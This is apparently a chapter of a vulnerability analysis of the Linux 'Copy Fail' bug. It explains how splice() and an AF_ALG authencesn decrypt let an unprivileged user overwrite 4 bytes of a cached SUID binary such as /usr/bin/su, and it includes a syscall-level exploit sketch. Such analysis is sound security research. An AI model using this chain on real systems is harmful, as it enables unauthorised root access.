4 Vulnerability Anatomy
4.1 Vulnerability Overview
At a high level, this bug lets an unprivileged user modify a few bytes of a root-owned executable "file", even though that file was only supposed to be read, not written.
The trick is that the write does not go through the normal filesystem write path at all. Instead, the attacker makes the kernel treat file-backed pages as part of a crypto request, and then relies on a buggy decrypt path to write 4 controlled bytes past the end of the valid output, into the in-memory page cache that execve() later reuses.
So the bug is the opposite of a copy. Instead:
- the target file page is first borrowed into a pipe by the zero-copy splice() path,
- that page is then reused inside an AF_ALG AEAD decrypt request,
- and the selected buggy authencesn() decrypt implementation writes 4 bytes into the wrong place.
If the chosen target is a SUID binary such as /usr/bin/su, corrupting its cached executable bytes is enough to turn a decrypt request into local privilege escalation. The request itself may fail, but that does not matter.
4.2 Copy Fail Exploit Chain
After a deep dive through the Linux kernel, the exploit chain becomes easier to read. Each step below links back to the section where that mechanism was introduced.
- Pick a file-backed executable target whose bytes are served through the page cache. For privilege escalation, the target can be a root-owned SUID binary such as /usr/bin/su.
- Open an AF_ALG AEAD socket path for authencesn(hmac(sha256),cbc(aes)), so a later recvmsg() reaches the selected authencesn() decrypt path.
- Use sendmsg() to queue attacker-controlled AAD. Bytes 4..7 of that AAD become seqno_lo, the 4-byte value later written by crypto_authenc_esn_decrypt() during the "OOB" scatterlist walk.
- Use splice(file -> pipe) so the pipe holds a pipe_buffer referencing the target file's cached page, rather than a private copied buffer.
- Use the pipe -> socket splice path so that same pipe-backed page is forwarded through splice_to_socket(). Internally, the pipe buffer becomes a bio_vec, then a page-backed msg_iter marked with MSG_SPLICE_PAGES.
- On the accepted AF_ALG operation socket, af_alg_sendmsg() handles the MSG_SPLICE_PAGES payload and converts the page-backed iterator into the AEAD TX scatterlist. At this point, the target file's page-cache page has entered the crypto request path.
- Let _aead_recvmsg() build the decrypt request scatterlist: the valid RX output head is backed by the caller's receive buffer, while the preserved TX tag tail can still point at the spliced file-backed page.
- Trigger decrypt with recvmsg(). On the authencesn() decrypt path, the kernel performs the destination-side scratch write at assoclen + cryptlen.
- Because scatterwalk follows the chained scatterlist mechanically, that 4-byte write crosses the valid decrypt output boundary and lands in the next chained entry, which is backed by the target file's page-cache page.
- The decrypt operation fails authentication and returns an error, but the 4-byte overwrite remains in page cache. A later execve() of the target binary consumes the corrupted executable bytes.
Chained from the kernel perspective:
Exploit chain
════════════════════════════════════════════════════════════
1. choose target
root-owned SUID executable
e.g. /usr/bin/su
│
▼
2. file page enters pipe
splice(file -> pipe)
pipe_buffer references cached file page
│
▼
3. pipe page enters socket send path
splice(pipe -> socket)
pipe_buffer -> bio_vec -> msg_iter
MSG_SPLICE_PAGES
│
▼
4. page enters AF_ALG TX scatterlist
af_alg_sendmsg()
extract_iter_to_sg()
│
▼
5. attacker-controlled AAD is queued
AAD[4:8] = seqno_lo
4-byte value to be written later
│
▼
6. decrypt request is built
_aead_recvmsg()
RX output head + chained TX tag tail
│
▼
7. authencesn decrypt runs
crypto_authenc_esn_decrypt()
│
▼
8. destination-side scratch write
scatterwalk_map_and_copy(...,
dst,
assoclen + cryptlen,
4,
out = 1)
│
▼
9. scatterwalk follows sg_next()
valid RX output -> chained TX tag entry
│
▼
10. page-cache overwrite
4 attacker-controlled bytes land in cached file page
│
▼
11. later execve()
kernel executes corrupted cached executable bytes
In compact form:
SUID file page → splice(file -> pipe) → pipe_buffer refs cached page → splice(pipe -> socket) → msg_iter with MSG_SPLICE_PAGES → AF_ALG TX scatterlist → TX tag tail chained after RX output → authencesn scratch write @ assoclen+cryptlen → scatterwalk follows sg_next() → 4-byte page-cache overwrite → later execve() runs corrupted cached executable bytes
4.3 Vulnerable Execution Path
This section closes the last gap left at the end of Chapter 3. We already proved the algorithm-side write in authencesn(); now we follow one target file page until it becomes the chained TX-side scatterlist entry that sits behind the decrypt boundary.
4.3.1 File-to-pipe Page Installation
The first half of the primitive comes from the regular-file splice() path:
splice() → do_splice() → splice_file_to_pipe() → do_splice_read() → filemap_splice_read() → splice_folio_into_pipe()
The important effect is that splice_folio_into_pipe() creates a struct pipe_buffer that directly references the file-backed page-cache page:
*buf = (struct pipe_buffer) {
.ops = &page_cache_pipe_buf_ops,
.page = page, // cached file page
.offset = offset, // target file offset on page
.len = part,
};
So after splice(file -> pipe), the pipe does not hold an anonymous copy of the file data. It holds a pipe-buffer entry pointing at the cached file page itself.
target file offset
|
v
cached file page in page cache (folio/page)
|
v
pipe buffer references that page
That gives the first half of the primitive:
target file offset -> cached file page -> pipe buffer reference
At this point, no corruption has happened yet. The only state we have is a file-backed page-cache page represented by a pipe buffer. The next question is how that pipe buffer reaches the AF_ALG request path.
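The difference between a pipe buffer that references a page and one that holds a private copy can be modeled in plain userspace C. This is only an analogy under stated assumptions: `model_pipe_buf`, `pipe_take_ref()`, `pipe_take_copy()`, and `write_through()` are hypothetical names, not kernel APIs, and a small byte array stands in for the cached file page.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MODEL_PAGE_SIZE 64  /* tiny stand-in for a real page */

/* Hypothetical userspace stand-in for struct pipe_buffer. */
struct model_pipe_buf {
    uint8_t *page;   /* backing storage the buffer points at */
    size_t   offset; /* start of the data inside that storage */
    size_t   len;    /* number of valid bytes */
};

/* Zero-copy style: the buffer aliases the "cached page" itself. */
struct model_pipe_buf pipe_take_ref(uint8_t *cached_page,
                                    size_t offset, size_t len)
{
    assert(offset + len <= MODEL_PAGE_SIZE);
    struct model_pipe_buf buf = { cached_page, offset, len };
    return buf;
}

/* Copy style: the buffer owns private storage filled from the page. */
struct model_pipe_buf pipe_take_copy(const uint8_t *cached_page,
                                     uint8_t *private_storage,
                                     size_t offset, size_t len)
{
    assert(offset + len <= MODEL_PAGE_SIZE);
    memcpy(private_storage, cached_page + offset, len);
    struct model_pipe_buf buf = { private_storage, 0, len };
    return buf;
}

/* Any later write through the buffer lands wherever buf.page points. */
void write_through(struct model_pipe_buf buf, size_t at, uint8_t value)
{
    assert(at < buf.len);
    buf.page[buf.offset + at] = value;
}
```

In this model, a write through the copying buffer leaves the original page untouched, while the same write through the referencing buffer changes the page itself. That aliasing is the property the rest of the chain depends on.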
4.3.2 Pipe Page Into TX Scatterlist
The pipe now references a cached file page. The exploit needs that same page reference to become crypto input, so the next step is splice(pipe -> AF_ALG socket).
That handoff happens when pipe data is spliced into the accepted AF_ALG operation socket. In splice_to_socket(), the kernel consumes pipe buffers and describes their backing pages as bio_vec entries (fs/splice.c:869-891):
struct pipe_buffer *buf = &pipe->bufs[tail & mask]; // pipe buffer
...
bvec_set_page(
&bvec[bc++],
buf->page, // page referenced by pipe_buffer
seg, // length
buf->offset // offset inside that page
);
...
msg.msg_flags = MSG_SPLICE_PAGES; // [!]
...
ret = sock_sendmsg(sock, &msg);
The important part is:
pipe_buffer page
|
v
bio_vec entry
|
v
socket sendmsg with MSG_SPLICE_PAGES
So the page is not copied into a normal userspace buffer. It is carried forward as a page-backed iterator into the socket send path.
For the accepted AF_ALG AEAD socket, sock_sendmsg() dispatches into aead_sendmsg(), which immediately forwards into af_alg_sendmsg():
sock_sendmsg()
|
v
aead_sendmsg()
|
v
af_alg_sendmsg()
Inside af_alg_sendmsg(), the exploit-relevant path is selected by MSG_SPLICE_PAGES (af_alg.c:1040-1061):
static int af_alg_sendmsg(struct socket *sock,
struct msghdr *msg, // sendmsg() message from user space
size_t size,
unsigned int ivsize)
{
...
// msg.msg_flags = MSG_SPLICE_PAGES
if (msg->msg_flags & MSG_SPLICE_PAGES) {
struct sg_table sgtable = {
.sgl = sg, // TX scatterlist
.nents = sgl->cur, // used entries
.orig_nents = sgl->cur,
};
// [!] conversion
plen = extract_iter_to_sg(
&msg->msg_iter, // spliced/page-backed iterator
len,
&sgtable, // append into sg table
MAX_SGL_ENTS - sgl->cur,
0
);
...
for (; sgl->cur < sgtable.nents; sgl->cur++)
get_page(sg_page(&sg[sgl->cur])); // keep page alive
...
This is the conversion point:
pipe-backed iterator
|
v
extract_iter_to_sg()
|
v
AF_ALG TX scatterlist entry
So the full bridge is:
cached file page
|
v
pipe buffer references that page
|
v
splice_to_socket()
|
v
MSG_SPLICE_PAGES sendmsg
|
v
af_alg_sendmsg()
|
v
extract_iter_to_sg()
|
v
TX scatterlist entry
At this point, the target file page is no longer only sitting behind a pipe buffer. It has become part of the AEAD request's TX scatterlist. It is still only input, though; the write becomes possible only after _aead_recvmsg() builds the in-place decrypt layout.
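The descriptor hand-off can be sketched as a userspace model in which each stage re-describes the same page instead of copying its bytes. All types and functions here (`sketch_page`, `sketch_pipe_buf`, `sketch_bvec`, `sketch_sg`, `sketch_pipe_to_bvec()`, `sketch_extract_to_sg()`) are hypothetical stand-ins, and the model folds the separate get_page() loop into the append step for brevity.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-ins; none of these are kernel types. */
struct sketch_page     { int refcount; uint8_t data[64]; };
struct sketch_pipe_buf { struct sketch_page *page; size_t offset, len; };
struct sketch_bvec     { struct sketch_page *page; size_t offset, len; };
struct sketch_sg       { struct sketch_page *page; size_t offset, len; };

/* Step 1: describe the pipe buffer's page as a bvec (no data copy). */
struct sketch_bvec sketch_pipe_to_bvec(const struct sketch_pipe_buf *buf)
{
    struct sketch_bvec bv = { buf->page, buf->offset, buf->len };
    return bv;
}

/*
 * Step 2: append bvecs to a scatterlist table, taking one page reference
 * per appended entry. `used` is the number of occupied slots and `max`
 * the table capacity. Returns the number of entries appended.
 */
size_t sketch_extract_to_sg(const struct sketch_bvec *bv, size_t nbv,
                            struct sketch_sg *sg, size_t used, size_t max)
{
    size_t added = 0;

    assert(used <= max);
    while (added < nbv && used + added < max) {
        struct sketch_sg *e = &sg[used + added];

        e->page = bv[added].page;     /* same page, new descriptor */
        e->offset = bv[added].offset;
        e->len = bv[added].len;
        e->page->refcount++;          /* keep the page alive while queued */
        added++;
    }
    return added;
}
```

The point of the model is pointer identity: after both steps, the scatterlist entry's `page` field is the same address the pipe buffer held, with only the reference count changed.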
file-backed page enters AEAD TX path
═══════════════════════════════════════════════
┌────────────────────────────┐
│ target file page cache │
│ /usr/bin/su @ offset X │
└──────────────┬─────────────┘
│ splice(file -> pipe)
▼
┌────────────────────────────┐
│ pipe buffer │
│ references cached page │
└──────────────┬─────────────┘
│ splice(pipe -> AF_ALG socket)
│ MSG_SPLICE_PAGES
▼
┌────────────────────────────┐
│ AF_ALG TX scatterlist │
│ sg entry references page │
└────────────────────────────┘
4.3.3 Chained Decrypt Request Layout
Now the AF_ALG operation socket has both ingredients:
- attacker-controlled AAD submitted through the normal sendmsg() path;
- file-backed TX scatterlist entries imported through the MSG_SPLICE_PAGES path.
_aead_recvmsg() is where those two ingredients are combined. It converts the queued TX state and the caller's RX buffer into the final AEAD decrypt request.
On the decrypt path, the construction happens in three steps:
- copy output-sized prefix: from TX (AAD || ciphertext || tag) to RX (AAD || ciphertext)
- preserve the left-over TX tag tail: tag
- chain preserved tag after RX head: RX head → TX tag tail
In code, the important operations are:
- crypto_aead_copy_sgl() copies the decrypt output-sized prefix into RX: AAD || ciphertext.
- af_alg_pull_tsgl() preserves the TX-side tag tail instead of copying it into the RX output region.
- sg_chain() links that preserved TX tail after the RX head.
- aead_request_set_crypt() and aead_request_set_ad() wire the final struct aead_request.
The final request shape is:
AEAD decrypt request
════════════════════════════════════════════════════
req->src ──▶ RX head ───────────────▶ TX tag tail
[ AAD || ciphertext ] [tag]
req->dst ──▶ RX head
[ AAD || plaintext ]
^
valid output ends here
The exploit-relevant detail is the TX tag tail:
- preserved input tag region
- chained after the RX output head
- can still be backed by the spliced file page
This is the exact point where the file-backed page imported through the pipe becomes the next scatterlist entry after the valid decrypt output region. The page is now positioned behind the boundary; the remaining missing piece is a write that starts at that boundary.
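The copy/preserve/chain construction can be modeled in userspace with a two-entry segment list. This is a simplified sketch, not the kernel's data structures: `layout_seg`, `layout_build()`, and `layout_locate()` are hypothetical names, and a flat `tx` buffer stands in for the TX scatterlist contents.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical model of one scatterlist entry: a pointer plus a length. */
struct layout_seg {
    uint8_t *buf;
    size_t   len;
};

/*
 * Build a two-entry chain from a flat TX buffer laid out as
 * AAD || ciphertext || tag:
 *   seg[0] = RX head, a private copy of the first assoclen + ctlen bytes
 *   seg[1] = TX tag tail, still pointing into the TX buffer itself
 */
void layout_build(uint8_t *tx, size_t assoclen, size_t ctlen, size_t taglen,
                  uint8_t *rx, size_t rx_cap, struct layout_seg seg[2])
{
    size_t outlen = assoclen + ctlen;

    assert(outlen <= rx_cap);
    memcpy(rx, tx, outlen);    /* copy the output-sized prefix */
    seg[0].buf = rx;
    seg[0].len = outlen;
    seg[1].buf = tx + outlen;  /* preserve the tag tail by reference */
    seg[1].len = taglen;
}

/*
 * Map a logical offset in the chain to (entry index, offset in entry).
 * Returns 0 on success, -1 if the offset is past the end of the chain.
 */
int layout_locate(const struct layout_seg *seg, size_t nseg, size_t off,
                  size_t *idx, size_t *inner)
{
    for (size_t i = 0; i < nseg; i++) {
        if (off < seg[i].len) {
            *idx = i;
            *inner = off;
            return 0;
        }
        off -= seg[i].len;
    }
    return -1;
}
```

With 8 bytes of AAD, 16 bytes of ciphertext, and a 16-byte tag, logical offset 24 resolves to entry 1 at inner offset 0, which is the first byte of the preserved tag tail rather than anything inside the RX copy.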
4.3.4 Authencesn Scratch Write
The previous step leaves us with a decrypt request whose req->dst starts at the RX head, while the preserved TX tag tail is chained immediately after that valid output region. Nothing has been overwritten yet; _aead_recvmsg() has only constructed the shape.
The overwrite happens only when that prepared request is submitted to the selected AEAD implementation. In this path, crypto_aead_decrypt() dispatches the request into crypto_authenc_esn_decrypt(), the decrypt callback for authencesn(hmac(sha256),cbc(aes)).
The exploit-relevant lines are:
cryptlen -= authsize;
...
/*
* Read the first 8 bytes from dst into tmp.
*
* In this request layout, dst starts at the RX head,
* whose first bytes are the AAD.
*/
scatterwalk_map_and_copy(
tmp,
dst,
0,
8,
0 // read flag: scatterlist -> tmp
);
/*
* Write the lower 4 bytes back near the AAD area.
*/
scatterwalk_map_and_copy(
tmp,
dst,
4,
4,
1 // write flag: tmp -> scatterlist
);
/*
* Write the upper 4 bytes at the decrypt boundary.
*
* This is the Copy Fail write.
*/
scatterwalk_map_and_copy(
tmp + 1,
dst,
assoclen + cryptlen,
4,
1 // write flag: tmp -> scatterlist
);
The first scatterwalk_map_and_copy() reads 8 bytes from the beginning of dst into tmp. Since req->dst starts at the RX head, and the RX head begins with the AAD, this captures:
tmp
┌────────────┬────────────┐
│ tmp[0] │ tmp[1] │
│ AAD[0:4] │ AAD[4:8] │
└────────────┴────────────┘
So the attacker-controlled bytes staged in AAD[4:8] become tmp + 1.
Then authencesn() uses that tmp + 1 pointer as the source of the second scratch write:
scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
That gives the value flow:
AAD[4:8] -> read into tmp[1] (tmp+1) -> 4-byte scratch write source
The offset side is separate. cryptlen is first reduced by the tag size:
cryptlen -= authsize;
So at the time of the write:
cryptlen = ciphertext length
and the destination offset becomes:
assoclen + cryptlen
= AAD length + ciphertext length
= end of valid decrypt output
Therefore the write operation is:
value = AAD[4:8]
target = dst @ assoclen + cryptlen
size = 4 bytes
Visually:
valid decrypt output
┌────────────┬────────────────────┐
│ AAD │ plaintext │
└────────────┴────────────────────┘
^
│
AAD[4:8] is written here as 4 bytes
Because scatterwalk_map_and_copy() walks the destination scatterlist mechanically, the write does not stop just because the AEAD output boundary ends there. If the next scatterlist entry is chained after RX, sg_next() carries the write forward.
In this exploit path, that next entry is the preserved TX tag tail backed by the spliced file page. That completes the bridge from attacker-controlled AAD bytes to a page-cache-backed destination.
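The value flow and the boundary crossing can be replayed on a userspace model. This is a minimal sketch under assumptions: `walk_seg`, `walk_copy()`, and `esn_shuffle()` are hypothetical names, `walk_copy()` is a simplified stand-in for scatterwalk_map_and_copy() that only models offset walking, and `tmp` is a byte array here, so the kernel's `tmp + 1` (a 32-bit pointer step) appears as `tmp + 4`.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical model of one chained scatterlist entry. */
struct walk_seg {
    uint8_t *buf;
    size_t   len;
};

/*
 * Copy nbytes between a flat buffer and the chain, starting at logical
 * offset `start`. out != 0 means flat -> chain, out == 0 means
 * chain -> flat. The walk only looks at entry lengths; it has no notion
 * of where the "valid output" ends. Returns the bytes actually copied.
 */
size_t walk_copy(uint8_t *flat, struct walk_seg *seg, size_t nseg,
                 size_t start, size_t nbytes, int out)
{
    size_t done = 0;

    for (size_t i = 0; i < nseg && done < nbytes; i++) {
        if (start >= seg[i].len) {   /* skip entries before the offset */
            start -= seg[i].len;
            continue;
        }
        size_t chunk = seg[i].len - start;
        if (chunk > nbytes - done)
            chunk = nbytes - done;
        if (out)
            memcpy(seg[i].buf + start, flat + done, chunk);
        else
            memcpy(flat + done, seg[i].buf + start, chunk);
        done += chunk;
        start = 0;                   /* later entries start at byte 0 */
    }
    return done;
}

/* The three copies from the excerpt above, replayed on the model chain.
 * `cryptlen` is the length after the tag size has been subtracted. */
void esn_shuffle(struct walk_seg *seg, size_t nseg,
                 size_t assoclen, size_t cryptlen)
{
    uint8_t tmp[8];

    walk_copy(tmp, seg, nseg, 0, 8, 0);      /* read AAD[0:8] into tmp */
    walk_copy(tmp, seg, nseg, 4, 4, 1);      /* tmp[0:4] -> dst @ 4 */
    walk_copy(tmp + 4, seg, nseg,
              assoclen + cryptlen, 4, 1);    /* tmp[4:8] -> boundary */
}
```

If the first entry is a 24-byte RX head beginning with "AAAAPWN!" (8 bytes of AAD plus 16 of ciphertext) and the second entry is a separate buffer, `esn_shuffle(seg, 2, 8, 16)` leaves "PWN!" in the first four bytes of the second entry. Nothing in the walk distinguishes that entry from legitimate output space.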
4.3.5 Page-cache Overwrite Primitive
Now the two halves meet. The previous step showed the write gadget:
scatterwalk_map_and_copy(
tmp + 1,
dst,
assoclen + cryptlen, // scatterlist walk oob
4, // bytes to write
1 // write flag
);
From 4.3.4, the value comes from the AAD:
AAD[4:8] -> tmp + 1 -> 4-byte scratch write source
By itself, that is only a 4-byte destination-side scatterlist write. It becomes the Copy Fail primitive because of the request layout built earlier: dst starts at the RX output head, but the scatterlist does not stop there. After the valid decrypt output region, it continues into the preserved TX tag entry.
That preserved TX tag entry came from the spliced pipe path. Earlier, af_alg_sendmsg() imported the MSG_SPLICE_PAGES payload into the AEAD TX scatterlist, so the chained tag entry can still reference the target file's cached page.
Now the primitive is fully assembled:
- WHAT to write:
  - AAD[4:8] / seqno_lo
- HOW the write happens:
  - authencesn scratch write
  - scatterwalk_map_and_copy(..., dst, assoclen + cryptlen, 4, out = 1)
- WHERE it lands:
  - chained TX tag entry
  - spliced file-backed page
So the write path is:
attacker input
──────────────
AAD[4:8] / seqno_lo
│
▼
authencesn scratch write
────────────────────────
scatterwalk_map_and_copy(tmp + 1,
dst,
assoclen + cryptlen,
4,
out = 1)
│
▼
scatterlist crossing
────────────────────
dst output boundary
│
▼
sg_next()
│
▼
preserved TX tag entry
│
▼
file-backed page-cache page
This is the core Copy Fail primitive: a 4-byte attacker-controlled value is written through the AEAD destination scatterlist into a page-cache-backed entry.
The important point is that userspace never performs a normal write() to the target file. The file page is first imported through splice(), then carried into the AF_ALG TX scatterlist, and finally overwritten by the kernel-side authencesn scratch write.
To turn this into a write-what-where primitive, we need the syscall sequence that arranges those kernel states from userspace.
4.3.6 Syscall-level Primitive
At the syscall level, the primitive is not a normal file write. Userspace only arranges two things:
- the 4-byte value to write, staged through AAD[4:8]
- the file-backed target page, staged through splice()
Then it triggers the kernel-side decrypt path.
A sketch of the exploit workflow:
/*
* This is a syscall-level sketch, not a complete standalone exploit.
* Key setup, authsize setup, IV/control messages, exact offsets, and
* error handling are intentionally collapsed so primitive shape stays visible.
*/
/* 1. Open the AF_ALG AEAD transform. */
int tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))",
};
bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa));
/*
* 2. Configure key/authsize, then accept the operation socket.
*
* setsockopt(tfm_fd, SOL_ALG, ALG_SET_KEY, ...);
* setsockopt(tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, ...);
*/
int op_fd = accept(tfm_fd, NULL, NULL);
/*
* Victim target:
*
* The first splice selects the target file-backed page that we want
* to carry into the pipe, and later into the AF_ALG TX scatterlist.
*/
char *victim = "/usr/bin/su";
int target_file_fd = open(victim, O_RDONLY);
off_t target_file_offset = 0x1234; /* victim file/page selection offset */
size_t splice_len = 0x1000; /* enough bytes for the planned TX layout */
int pipe_fds[2];
pipe(pipe_fds);
/*
* 3. Queue attacker-controlled AAD.
*
* AAD[4:8] becomes seqno_lo.
* authencesn later writes these 4 bytes through:
*
* scatterwalk_map_and_copy(tmp + 1,
* dst,
* assoclen + cryptlen,
* 4,
* 1);
*/
uint8_t write_value[4] = { 'P', 'W', 'N', '!' };
uint8_t aad[8];
memset(aad, 'A', 4); /* AAD[0:4] */
memcpy(aad + 4, write_value, 4); /* AAD[4:8] = seqno_lo */
struct iovec aad_iov = {
.iov_base = aad,
.iov_len = sizeof(aad),
};
struct msghdr aad_msg = {
.msg_iov = &aad_iov,
.msg_iovlen = 1,
.msg_control = cmsg_buf, /* ALG_SET_OP / ALG_SET_AEAD_ASSOCLEN / IV */
.msg_controllen = cmsg_len,
};
/*
* MSG_MORE keeps the AF_ALG request open so more input can be appended.
*/
sendmsg(op_fd, &aad_msg, MSG_MORE);
/*
* 4. Splice the target file page into a pipe.
*
* Kernel-side effect:
*
* target file page cache
* -> pipe_buffer
*/
splice(
target_file_fd,
&target_file_offset,
pipe_fds[1],
NULL,
splice_len,
0
);
/*
* 5. Splice the pipe into the AF_ALG operation socket.
*
* Kernel-side effect:
*
* pipe_buffer
* -> bio_vec
* -> msg_iter marked MSG_SPLICE_PAGES
* -> AF_ALG TX scatterlist
*/
splice(
pipe_fds[0],
NULL,
op_fd,
NULL,
splice_len,
0
);
/*
* 6. Trigger decrypt.
*
* rx_buf is the normal caller-provided receive buffer.
*
* _aead_recvmsg() builds:
*
* RX output head -> preserved TX tag tail
*
* Then authencesn performs the destination-side scratch write.
*/
recv(op_fd, rx_buf, rx_len, 0);
The exact offset choreography is handled later (see 5.2). For now, the important mapping is:
- target_file_offset → selects file-backed page entering pipe
- AF_ALG decrypt layout → positions that page inside the preserved TX tag tail
- assoclen + cryptlen → makes the authencesn scratch write land at the RX/TX chain boundary
Read as one execution stream:
controlled AAD[4:8]
│
│ sendmsg()
▼
AF_ALG request input
│
│ splice(file -> pipe)
▼
pipe references target page-cache page
│
│ splice(pipe -> AF_ALG socket)
▼
AF_ALG TX scatterlist contains page-backed entry
│
│ recv()
▼
_aead_recvmsg() chains TX tag tail after RX output
│
│ authencesn decrypt
▼
AAD[4:8] written at dst @ assoclen + cryptlen
The decrypt may fail authentication, but that failure is not a rollback point. The scratch write has already happened.
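The "failure is not a rollback point" ordering can be illustrated with a small userspace model. `scratch_then_verify()` is a hypothetical function, not kernel code; it only mirrors the order of events described above: a side-effecting write first, a tag comparison afterwards, and an error return that undoes nothing.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical decrypt-like routine: it performs a 4-byte scratch write
 * first and only afterwards compares the tag. A mismatch returns
 * -EBADMSG, but nothing restores the bytes written earlier.
 */
int scratch_then_verify(uint8_t *scratch_target, const uint8_t value[4],
                        const uint8_t *tag, const uint8_t *expected,
                        size_t taglen)
{
    assert(taglen > 0);
    memcpy(scratch_target, value, 4);  /* side effect happens here */

    if (memcmp(tag, expected, taglen) != 0)
        return -EBADMSG;               /* failure, but no rollback */
    return 0;
}
```

A caller that sees the error return has no indication that `scratch_target` was modified, which is why the failed decrypt still leaves the overwrite in place.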
4.3.7 Execution from Corrupted Cache
After the overwrite, the target file's page-cache page contains modified bytes. For an executable file, later execve() may consume those cached bytes as instruction data.
For a root-owned SUID target, that means:
4-byte page-cache overwrite
│
▼
corrupted executable page
│
▼
later execve()
│
▼
modified code runs in SUID program context
At this point, the remaining exploit work is to place attacker-controlled patch bytes into the victim file's page-cache page.
In Chapter 7, we will finally turn this primitive into working exploit implementations across different languages, right after a quick PoC that shows how to construct an exploit (Chapter 5) and a demonstration of runtime debugging evidence (Chapter 6).